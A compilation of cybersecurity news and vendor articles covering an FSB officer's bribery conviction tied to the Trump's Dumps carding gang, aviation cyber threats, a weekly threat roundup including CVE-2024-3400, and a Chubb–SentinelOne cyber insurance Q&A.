The head of counterintelligence for a division of the Russian Federal Security Service (FSB) was sentenced last week to nine years in a penal colony for accepting a USD $1.7 million bribe to ignore the activities of a prolific Russian cybercrime group that hacked thousands of e-commerce websites. The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps.

A now-defunct carding shop that sold stolen credit cards and invoked 45’s likeness and name.

As reported by The Record, a Russian court last week sentenced former FSB officer Grigory Tsaregorodtsev for taking a $1.7 million bribe from a cybercriminal group that was seeking a “roof,” a well-placed, corrupt law enforcement official who could be counted on to both disregard their illegal hacking activities and run interference with authorities in the event of their arrest.

Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia. In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data. They also seized multiple carding shops run by the gang, including Ferum Shop, Sky-Fraud, and Trump’s Dumps, a popular fraud store that invoked the 45th president’s likeness and promised to “make credit card fraud great again.”

All of the domains seized in that raid were registered by an IT consulting company in Perm called Get-net LLC, which was owned in part by Artem Zaitsev — one of the six men arrested. Zaitsev reportedly was a well-known programmer whose company supplied services and leasing to the local FSB field office.

The message for Trump’s Dumps users left behind by Russian authorities that seized the domain in 2022.

Russian news sites report that Internal Affairs officials with the FSB grew suspicious when Tsaregorodtsev became a little too interested in the case following the hacking group’s arrests. The former FSB agent had reportedly assured the hackers he could have their case transferred and that they would soon be free.

But when that promised freedom didn’t materialize, four the of the defendants pulled the walls down on the scheme and brought down their own roof. The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars.

At Tsaregorodtsev’s trial, his lawyers argued that their client wasn’t guilty of bribery per se, but that he did admit to fraud because he was ultimately unable to fully perform the services for which he’d been hired.

The Russian news outlet Kommersant reports that all four of those who cooperated were released with probation or correctional labor. Zaitsev received a sentence of 3.5 years in prison, and defendant Alexander Kovalev got four years.

In 2017, KrebsOnSecurity profiled Trump’s Dumps, and found the contact address listed on the site was tied to an email address used to register more than a dozen domains that were made to look like legitimate Javascript calls many e-commerce sites routinely make to process transactions — such as “js-link[dot]su,” “js-stat[dot]su,” and “js-mod[dot]su.”

Searching on those malicious domains revealed a 2016 report from RiskIQ, which shows the domains featured prominently in a series of hacking campaigns against e-commerce websites. According to RiskIQ, the attacks targeted online stores running outdated and unpatched versions of shopping cart software from Magento, Powerfront and OpenCart.

Those shopping cart flaws allowed the crooks to install “web skimmers,” malicious Javascript used to steal credit card details and other information from payment forms on the checkout pages of vulnerable e-commerce sites. The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.

PinnacleOne ExecBrief | Aviation Cybersecurity

Last week, PinnacleOne reviewed escalation dynamics in the Middle East.

This week, we turn our attention to domestic critical infrastructure with a look at recent developments in aviation cybersecurity.

Please subscribe to read future issues — and forward this newsletter to interested colleagues.

Contact us directly with any comments or questions: pinnacleone-info@sentinelone.com

Insight Focus | Aviation Cybersecurity

The aviation sector continues to face a complex and evolving cybersecurity threat landscape with nation-state actors, cybercriminal groups, and hacktivists targeting critical infrastructure. Last week, the FAA issued a ground stop order on Alaska Airlines for one hour due to an “upgrade issue with flight software that calculates weight and balance.” This follows a similar hour-long nationwide ground stop last year caused by a software update at United Airlines, a network-wide outage at WestJet caused by a service provider, and a ransomware breach at Sabre.

Most concerningly, on Friday, the Department of Homeland Security (DHS) published an official notice stating that the Transportation Security Oversight Board (TSOB) has recommended to the Transportation Security Administration (TSA) that a cybersecurity emergency exists, warranting the expedited implementation of critical cyber mitigation measures through emergency regulatory authority.

The TSOB – including the Secretaries of Homeland Security, Transportation, Defense, and the Treasury, the Attorney General, the Director of National Intelligence, and a National Security Council representative — convened a meeting to review TSA’s transportation security plans for cybersecurity in the aviation sector and provide a recommendation regarding TSA’s emergency determination to issue Joint Emergency Amendment (EA) 23-01.

During the classified briefing, the TSOB was presented with sensitive security information and intelligence regarding the severe cyber threat to the aviation transportation system. The board discussed the circumstances leading to TSA’s issuance of Joint EA 23-01, which requires performance-based cybersecurity measures to prevent the disruption and degradation of critical systems. The TSOB’s recommendation endorsed the need for TSA to proceed with these critical mitigation measures on an emergency basis.

This development came in the context of a September 2023 advisory from the Cybersecurity and Infrastructure Security Agency (CISA), which identified indicators of compromise at an Aeronautical Sector organization as early as January 2023. Nation-state advanced persistent threat (APT) actors exploited vulnerabilities in a public-facing application (Zoho ManageEngine ServiceDesk Plus) and a firewall device to gain unauthorized access, establish persistence, and move laterally through the network. CISA warned that “additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.” APT interest in critical infrastructure means that such exploitation happens on other devices and software, too, not just the Zoho product in this particular alert.

Aviation Cybersecurity Risks

Leaks of intelligence documents in 2023 from Russia indicated a specific interest in targeting operational aviation systems. Further, Chinese threat actors are known to be targeting US critical infrastructure firms (including the aviation sector) given their military doctrine that sees disrupting civilian systems as a means of deterring or coercing US political decision-makers in a time of conflict.

Participants in the USAF Civil Reserve Air Fleet should also expect to be targeted for their role supporting contingency airlift requirements for the Department of Defense, something likely to be activated in a Taiwan crisis situation.

Against this geopolitical backdrop, aviation CISOs face a complex technology and cybersecurity risk environment, resulting from:

  • Growing integration of new tech into legacy systems, including new connectivity interfaces and e-Enabled aircraft;
  • Increasing federal cyber regulations and compliance requirements;
  • Constrained security budgets that limit focus to catastrophic risks and compliance;
  • Security cultures that often silo cyber/IT from the broader organization and create obstacles to effective enterprise engagement and operational collaboration;
  • Tactically oriented people, processes, and tooling aimed at immediate triage, not strategic risk;
  • Complex global supply chains that increase upstream risk exposure; and
  • Increasing third-party risks from the economy-wide move to, and dependency on, cloud-enabled services and the associated shift in risk management responsibilities.

While the geopolitical threats to aviation cybersecurity grow, aviation faces the technical difficulty of defending complex legacy and modern systems. The industry must protect a uniquely broad range of vulnerable elements from its airport and online systems and data to vendor supply chains and airplane electronics. Despite all this, aviation cybersecurity’s resources and incentives lag the threat environment.

Corporate executives must recognize that the aviation industry remains at the frontlines of emerging geopolitical risk, and cybersecurity threats have the potential to cause significant operational, financial, and reputational damage. The TSOB’s recommendation and the CISA advisory underscore the urgency of the situation and the need for high-level, enterprise-wide engagement to address these risks effectively.

Investing in a comprehensive cybersecurity strategy, aligning technical and security stacks, and fostering collaboration between corporate and cybersecurity leadership is essential to mitigate the risk of a catastrophic event. As the DHS notice and CISA advisory demonstrate, the stakes are high, and failure to act decisively could result in severe consequences for the aviation industry and national security.

The aviation sector must consider modern, more expansive risk models to navigate a strategic environment at the nexus of emerging cyber and geopolitical threats. Even when the risks are clear and the gaps manifest, tight budgets and other business priorities can get in the way of building an effective security organization. This requires high-level, executive engagement across the enterprise to help leadership understand how these risks impact operational reliability, customer relations, corporate liability, shareholder value, passenger safety, and national security.

The combination of legacy IT/OT with new connectivity interfaces, sprawling third-party dependencies and digital supply chains, strained corporate balance sheets and infosec budgets, increasing regulatory mandates, highly visible industry stumbles, and aggressive nation-state threats indicate major turbulence ahead.

The Good, the Bad and the Ugly in Cybersecurity – Week 16

The Good | DoJ Indicts Cryptojacking Criminal and Botnet Operator Supporting Ransomware Actors

The DoJ doled out two indictments this week: the first announcing the arrest of Charles O. Parks III for his role in an elaborate cryptojacking scheme, the second, charging Alexander Lefterov, owner and operator of a major botnet.

Parks was charged with wire fraud, money laundering, and illegal transactions, tallying up to a maximum of 30 years in prison. According to the DoJ, the basis of Parks’ scheme was renting $3.5 million worth of cloud servers through a number of fake LLCs in order to mine nearly $1 million in cryptocurrency.

After tricking the cloud service providers (CSPs) into escalating his privileges, Parks was given access to services equipped with powerful graphics cards that were then used to mine Monero, Litecoin, and Ether. The mined funds were laundered through purchasing NFTs and converting them through traditional banks and various crypto exchanges to fund a lavish lifestyle.

Lefterov was indicted by a federal grand jury for aggravated identity theft, computer fraud, and conspiracy to commit wire fraud. Through the large-scale botnet he maintained, the Moldovan national and his associates have been linked to thousands of compromised computers across the U.S.

Source: FBI

Using credentials harvested from the infected computers, Lefterov and his co-conspirators targeted victims’ financial accounts across banking, payment processing, and retail platforms to steal money. In tandem, Lefterov allegedly leased his botnet to other cybercriminals for ransomware distribution, later receiving a share of the profits from successful attacks.

Following both of these indictments, U.S. law enforcement reiterates their commitment to cyber defense, stating that the FBI and its partners will continue to investigate and pursue those involved in malicious activities both domestically and internationally.

The Bad | Researchers Link Russian-Based Sandworm APT to Attacks on Water Supply Systems

GRU-linked APT known as Sandworm has recently taken a behind-the-scenes approach, conducting covert attacks through various online personas and posing as hacktivist groups to mask their activities. In a new report, cybersecurity researchers identified Sandworm’s presence in at least three Telegram channels created to conduct disruptive operations and amplify pro-Russian narratives.

Sandworm has operated since 2009 under Unit 74455 of the Main Intelligence Directorate of the Russian Federation (GRU). Known to employ adaptive and diverse methods for initial access and exploit supply chain vulnerabilities, Sandworm is thought by researchers to be one of Russia’s foremost “cyber sabotage units” as well as a “formidable” threat globally.

Most recently, Sandworm has begun using online personas to execute disruptive operations and enhance the image of the GRU’s cyber capabilities. The report tracks the APT groups’ activity across three Telegram channels: XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek. While most of the activity centers around targeting Ukrainian entities, one of the channels this week claimed attacks on critical water supply centers in the U.S. and Poland, and a hydroelectric facility in France. The posted videos showed fake images of attackers manipulating the controls of water suppliers in Texas.

While Sandworm’s focus has shifted towards espionage and influence operations, it continues to conduct disruptive attacks, targeting electoral systems, conducting intelligence gathering, stealing credentials, and retaliating against perceived adversaries. Cyber defenders continue to warn of potential interference in upcoming national elections and political events across the world, with Ukraine remaining a primary target amid ongoing conflict.

The Ugly | Suspected Nation-State Actors Exploit Zero-Day Flaw in Palo Alto Network Firewalls

Over the weekend, state-sponsored threat actors were suspected of exploiting a zero-day vulnerability in Palo Alto Networks’ PAN-OS firewall software. Though the vulnerability was quickly disclosed and patched by the Californian cybersecurity company, exploit code has since emerged this week and is already being used in attacks. Despite earlier mitigations provided during initial discovery, Palo Alto Networks is now urging users to upgrade their software immediately as the most reliable solution.

Tracked as CVE-2024-3400, the maximum severity flaw enables unauthenticated remote code execution (RCE) via command injection in low-complexity attacks that do not require user interaction. It affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect, both gateway or portal. Palo Alto Networks’ advisory confirms that Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Researchers that initially detected the flaw found that the threat actor was focused on exporting configuration data from compromised devices before leveraging them to move laterally into victim organizations. Noting the level of tradecraft and speed of the attacks, the report suggests that the threat actor is highly capable with a clear playbook – indications of a state-backed attack. Along with warnings to secure vulnerable devices, CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog.

Malware workflow (Source: Volexity)

Internet-connected network devices are often running on outdated, unpatched firmware which makes them vulnerable to exploitation. This, along with the key role they play in network infrastructure, means such devices are considered low-hanging fruit to attackers looking for a way in. To mitigate risks, companies should prioritize regular patches, enforce robust access controls, and practice network segmentation to safeguard their networks against intrusion.

Insuring Cyber Health | Chubb’s Insight via SentinelOne Telemetry

In an expanding collaboration between Chubb, one of the largest publicly traded property and casualty insurance companies, and SentinelOne, a cybersecurity leader, clients of SentinelOne who are also Chubb policyholders can now share their enterprise cyber health assessment data with Chubb. This facilitates a more efficient and precise underwriting process.

With the increasing emphasis on cybersecurity investment, insurance carriers are seeking greater transparency into their insureds’ cybersecurity health. The collaboration not only offers policyholders streamlined access to SentinelOne’s cybersecurity solutions, but also enhances transparency into policyholders’ cyber health investments through SentinelOne’s Vital Signs Report.

This post captures a Q&A between Craig Guiliano, SVP of Threat Intelligence and Policyholder Services at Chubb, and Bridget Mead, Senior Manager of IR Cyber Risk at SentinelOne, as they address some frequently asked questions about the Vital Signs Report.

Q: What is the Vital Signs Report?

Chubb/Guiliano: The Vital Signs Report (VSR) is an assessment of our policyholders’ cybersecurity posture. This report is going to be a game changer for not only how we, as the carrier, assess our individual policyholder’s cybersecurity health, but for our ability to assess our portfolio exposure as one of the world’s largest insurance companies. Our underwriters are quickly moving away from checkboxes on a questionnaire and moving towards data-driven policy renewal decisions.

SentinelOne/Mead: The VSR is based on a collection of internal signals that we mapped to the Center for Internet Security’s (CIS) Critical Security Controls (CIS Controls) CIS18 framework. We make the report available to all SentinelOne clients at no charge. It displays the strength of a client’s digital environment in areas important to cyber security and the cyber insurance underwriting process. The graphic below shows the major categories included.

Q: How do clients access this report?

SentinelOne/Mead: We’ve made it easy for Chubb policyholders to share this report with Chubb. It’s just a few clicks away. Clients can access the VSR report by going to the Singularity Marketplace page and selecting the Cyber Insurance menu item. From the Cyber Insurance menu, they can select Chubb and consent to the sharing via an End-User License Agreement (EULA). Chubb will be notified on their end that the report has been shared.

Chubb/Guiliano: Once we receive the VSR on our end, our policyholders will be able to view the report with their insurance brokers and Chubb underwriters. We’re expecting more transparent and robust conversations around loss control strategies with our policyholders that share this data with us. In addition, participating policyholders may enjoy incentivized policy pricing, subject to applicable insurance laws and regulations, and more efficient underwriting.

Q: What happens after the SentinelOne client clicks through the EULA?

SentinelOne/Mead: From a technical perspective, once the SentinelOne client does the EULA click through, the VSR examines the client’s SentinelOne console, collects the appropriate data signals, and populates the report.

Chubb/Guiliano: The VSR will be available to view by Chubb in near real-time, allowing efficient and timely feedback to policyholders, brokers, and underwriters. Chubb and SentinelOne have also worked to minimize  the sensitivity of the data being shared with Chubb. We omit any sensitive information, including IP addresses associated with identified vulnerabilities.

Q: How can the VSR help organizations with risk transfer?

Chubb/Guiliano: Traditionally, our underwriters use a series of questions and attack surface information to evaluate a policyholder’s risk. They might also pull historical data from claims that the policyholder has submitted. However, this kind of risk assessment doesn’t give us the full picture and could include false positives. The VSR provides a clearer and more accurate and efficient mechanism for our policyholder’s Security Teams to communicate information and controls to our underwriting teams.

The report will reduce the time and overhead that our policyholder’s spend. Additionally, it gives the policyholder a chance to think critically about their cybersecurity through access to Chubb’s expertise on risk of loss indicators, such as known vulnerabilities and common attack vectors – expertise that is based on 20+ years of actual loss data.

SentinelOne/Mead: The VSR helps organizations with their risk transfer by bringing visibility to their telemetry. SentinelOne has configured and crafted the VSR to identify vulnerabilities, configurations, and asset management controls with Chubb’s review to help policyholders proactively identify exposures. The information provided by the VSR will enable the policyholders to remedy elements that may need improvement, enhance their cybersecurity posture, and ultimately lower risk profiles. The VSR allows policyholders to discuss renewals more confidently with Chubb and brings more transparency to those conversations.

Q: What benefits may accrue from participating in the VSR Program?

SentinelOne/Mead: From a technical perspective, the VSR is an accurate and efficient way to assess a company’s cyber security posture. Current SentinelOne clients can look at the VSR and craft clear action items to enhance their use of our tools.

Chubb/Guiliano: Any benefit to our policyholder’s risk profile is a benefit to Chubb at-large and we’re eager to see our policyholders develop greater insight into their cyber risk profile and thus gain more informed negotiating power within the cyber insurance marketplace and possible premium savings.

Learn More

On May 2, 2024 at 1:00PM ET, join SentinelOne, Chubb, Aon, and CyberAcuView for a webinar discussion on data-driven underwriting. Panelists will discuss how data has transformed underwriting and insurability assessments as businesses work with their carriers and brokers to improve their risk profiles.

Data Sharing in Cyber Insurance
Having the right telemetry streamlines underwriting and renewals, leading to benefits for the policyholders.

Chubb Disclosure: Chubb is the marketing name used to refer to subsidiaries of Chubb Limited providing insurance and related services. For a list of these subsidiaries, please visit our website at www.chubb.com. Insurance provided by ACE American Insurance Company and its U.S. based Chubb underwriting company affiliates. All products may not be available in all states. This material contains product summaries only. Coverage is subject to the language of the policies as actually issued. Surplus lines insurance sold only through licensed surplus lines producers. The material presented herein is advisory in nature and is offered as a resource to be used together with your professional insurance advisors in maintaining a loss prevention program. It is not intended as a substitute for legal, insurance, or other professional advice, but rather is presented for general information only. You should consult knowledgeable legal counsel or other knowledgeable experts as to any legal or technical questions you may have. Chubb, 202 Hall’s Mill Road, Whitehouse Station, NJ 08889-1600